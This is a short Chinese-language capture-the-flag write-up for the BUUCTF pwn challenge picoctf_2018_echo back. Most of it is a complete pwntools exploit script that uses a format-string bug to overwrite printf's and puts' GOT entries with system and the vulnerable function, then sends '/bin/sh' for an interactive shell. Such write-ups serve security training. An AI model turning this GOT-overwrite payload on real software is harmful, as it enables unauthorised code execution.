[BUUCTF-pwn]——picoctf_2018_echo back
和之前的一道题及其类似大家可以对比一下[BUUCTF-pwn]——ciscn_2019_sw_1
思路都是一样的就是将printf_got修改为system_plt表,然后循环调用就好
找偏移, 为7
不过有点难受的是, 不知道为什么利用fini_array不行,那里错了也不知道,没办法只有利用put的got表了。
exploit
from pwn import*
p=remote('node3.buuoj.cn',27945)
#p = process('./PicoCTF_2018_echo_back')
#gdb.attach(p, 'b printf')
printf_got = 0x0804A010
sys_plt = 0x08048460
puts_got = 0x0804A01C
vuln = 0x080485AB
fini = 0x08049F0C
offset = 7
payload = p32(puts_got + 2) + p32(printf_got+2) + p32(printf_got) + p32(puts_got)
payload += '%' + str(0x0804 - 0x10) + 'c%7$hn'
payload += '%8$hn'
payload += '%' + str(0x8460 - 0x0804) + 'c%9$hn'
payload += '%' + str(0x85AB - 0x8460) + 'c%10$hn'
p.recvuntil('message:\n')
p.send(payload)
p.recvuntil('message:\n')
p.sendline('/bin/sh\x00')
p.interactive()